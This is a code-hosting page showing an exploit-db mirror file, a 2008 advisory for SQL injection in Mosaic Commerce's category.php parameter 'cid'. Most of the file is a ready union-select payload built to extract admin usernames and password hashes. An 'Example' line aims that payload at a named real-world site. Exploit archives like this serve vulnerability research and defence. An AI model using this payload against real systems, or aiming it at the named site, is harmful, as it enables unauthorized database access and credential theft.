bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6763.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
No EOL
650 B
Text
Raw Blame History

Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
{SQL BUG}
/mosaic-path/category.php?cid=[SQL]
Exploit For Get Admin Username And Password Hash:
category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
Example:
http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
# milw0rm.com [2008-10-16]
Reference in a new issue View git blame Copy permalink